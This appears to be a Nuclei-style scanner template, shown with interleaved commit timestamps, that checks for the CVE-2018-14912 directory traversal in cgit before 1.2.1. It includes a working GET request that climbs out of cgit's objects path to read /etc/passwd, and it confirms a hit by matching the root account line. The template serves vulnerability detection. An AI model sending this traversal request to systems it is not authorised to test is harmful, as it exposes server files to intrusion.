2021-12-23 23:58:51 +00:00
id : CVE-2018-14912
2022-04-21 21:16:41 +00:00
2021-12-23 23:58:51 +00:00
info :
2022-11-29 05:37:01 +00:00
name : cgit < 1.2.1 - Directory Traversal
2021-12-23 23:58:51 +00:00
author : 0x_Akoko
2022-05-17 09:18:12 +00:00
severity : high
2022-04-22 10:38:41 +00:00
description : cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
2021-12-23 23:58:51 +00:00
reference :
- https://cxsecurity.com/issue/WLB-2018080034
- https://nvd.nist.gov/vuln/detail/CVE-2018-14912
2022-05-17 09:18:12 +00:00
- https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1627
2023-07-11 19:49:27 +00:00
- https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html
2021-12-23 23:58:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2018-14912
cwe-id : CWE-22
2023-07-15 16:29:17 +00:00
epss-score : 0.97328
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cgit_project
product : cgit
tags : cve,cve2018,cgit,lfi
2021-12-23 23:58:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-23 23:58:51 +00:00
- method : GET
path :
- "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200